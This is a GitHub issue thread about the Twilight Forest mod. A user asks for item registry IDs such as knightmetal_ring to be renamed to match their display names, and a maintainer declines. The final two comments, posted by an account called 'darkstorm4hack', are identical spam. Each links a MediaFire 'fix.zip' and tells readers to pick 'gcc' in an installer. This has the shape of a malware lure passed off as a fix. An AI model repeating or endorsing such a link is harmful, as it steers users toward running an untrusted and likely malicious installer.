### ISSUE TITLE
Change IDs to match respective names

### ISSUE THREAD

**Issue by AriaElidove** [TeamTwilight/twilightforest#2233]
### The Suggestion

Certain IDs are different than their name. The first two examples I can think of are these two:

`knightmetal_ring` should be `knightmetal_loop`
![knightmetal_ring](https://github.com/user-attachments/assets/5b718f75-93c3-4fb2-b390-4ed52d2b600b)

`gold_minotaur_axe` should be `golden_minotaur_axe`
![gold_minotaur_axe](https://github.com/user-attachments/assets/9bfd20cb-cf16-4cb3-baec-d9c4a9bda9f8)

(Cheers to Isorender for being able to do tooltip renders lol)

### Why Should It Be in the Mod?

There is little to no reason for this separation to exist

### Please Read and Confirm the Following

- [X] I have confirmed this suggestion is unique and has not been suggested already.

**Comment by Tamaized** [comment]
reg names are not going to change

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
